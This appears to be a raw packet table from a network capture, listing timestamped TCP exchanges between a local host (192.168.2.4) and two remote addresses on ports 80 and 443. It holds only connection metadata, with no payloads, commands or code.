Aug 10, 2024 16:12:24.970933914 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.971091986 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.976784945 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.976800919 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.976814985 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.976829052 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.976844072 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.976857901 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.976860046 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.976871967 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.976872921 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.976891041 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.976910114 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.996663094 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.996684074 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.996725082 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.996728897 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.996782064 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.996782064 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.996994972 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.997020006 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.997056007 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.997056961 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.997061014 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.997122049 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.997327089 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.997342110 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.997407913 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.997407913 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.997419119 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.997483969 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.000257969 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.000272036 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.000343084 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.000346899 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.000363111 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.000403881 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.002095938 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.002110958 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.002156019 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.002161980 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.002208948 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.002208948 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.002213955 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.002223015 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.002279043 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.002330065 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.002330065 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.002346992 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.002399921 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.002418995 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.002434015 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.002475977 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.002480030 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.002512932 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.002512932 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.014166117 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.014199972 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.014214039 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.014215946 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.014254093 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.014256001 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.014269114 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.014276981 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.014296055 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.014322996 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.014337063 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.014347076 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.014349937 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.014364958 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.014375925 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.014379978 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.014390945 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.014401913 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.014413118 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.014416933 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.014424086 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.014436960 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.014453888 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.014785051 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.014801025 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.014816999 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.014846087 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.014870882 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.014879942 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.014895916 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.014909029 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.014924049 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.014947891 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.014956951 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.015402079 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.015415907 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.015430927 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.015444040 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.015467882 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.015469074 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.015481949 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.015496969 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.015511036 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.015536070 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.015544891 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.015728951 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.015744925 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.015758991 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.015774965 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.015783072 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.015794039 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.015799046 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.015808105 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.015821934 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.015829086 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.015839100 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.015841007 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.015853882 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.015858889 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.015876055 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.015883923 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.015958071 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.015974045 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.016002893 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.016016006 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.016024113 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.016031027 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.016047001 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.016067028 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.016069889 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.016083002 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.016097069 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.016136885 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.016230106 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.016324043 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.018188953 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.019701004 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.021090031 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.021104097 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.021116972 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.021132946 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.021141052 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.021146059 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.021173000 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.021176100 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.021188021 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.021192074 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.021217108 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.021233082 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.024745941 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.024760008 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.024776936 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.024805069 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.024820089 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.024835110 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.024836063 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.024848938 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.024857044 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.024882078 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.024919987 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.024935007 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.024950027 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.024975061 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.024990082 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.025085926 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.025100946 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.025115013 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.025130033 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.025139093 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.025142908 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.025157928 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.025161028 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.025168896 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.025191069 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.025274038 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.025295973 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.025310040 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.025322914 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.025338888 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.025351048 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.025368929 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.025407076 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.028641939 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.028656960 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.028671026 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.028685093 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.028757095 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.028757095 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.028812885 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.028827906 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.028841972 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.028856993 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.028872013 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.028888941 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.028923988 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.028923988 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.028923988 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.028959036 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.028974056 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.028987885 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.029001951 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.029016972 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.029020071 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.029027939 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.029032946 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.029056072 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.029079914 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.029150963 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.029165030 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.029179096 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.029194117 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.029203892 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.029232025 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.029328108 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.029341936 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.029357910 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.029371977 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.029395103 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.029503107 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.029516935 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.029537916 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.029551029 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.029561043 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.029567003 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.029582977 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.029597998 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.029639006 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.029654026 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.029668093 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.029683113 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.029696941 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.029709101 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.029711962 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.029726028 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.029735088 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.029742002 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.029752016 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.029778004 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.037388086 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.037400961 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.037422895 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.037437916 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.037451982 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.037466049 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.037472963 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.037472963 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.037480116 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.037494898 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.037498951 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.037498951 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.037508011 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.037522078 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.037539005 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.037539005 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.037539005 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.037556887 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.037560940 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.037575960 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.037590027 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.037605047 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.037621021 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.037657976 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.037657976 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.037657976 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.037664890 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.037756920 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.037772894 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.037832975 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.037918091 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.037933111 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.037946939 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.037961960 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.037980080 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.037980080 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.038088083 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.038110971 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.038255930 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.038270950 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.038285971 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.038300037 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.038302898 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.038315058 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.038319111 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.038341045 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.038425922 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.038440943 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.038448095 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.038463116 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.038475037 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.038490057 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.038505077 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.038521051 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.038521051 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.038521051 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.038521051 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.038521051 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.038552046 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.038779020 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.038794041 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.038821936 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.038834095 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.038836956 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.038836956 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.038846970 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.038861036 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.038861990 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.038875103 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.038886070 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.038886070 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.038889885 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.038903952 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.038903952 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.038923025 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.038929939 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.038929939 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.038937092 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.038952112 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.038999081 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.038999081 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.038999081 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.039448023 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.039469957 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.039484024 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.039498091 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.039513111 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.039582968 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.039582968 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.039582968 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.039616108 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.039634943 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.039649963 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.039668083 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.039689064 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.039689064 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.039731979 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.039793968 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.039813042 CEST	80	49740	147.45.44.104	192.168.2.4
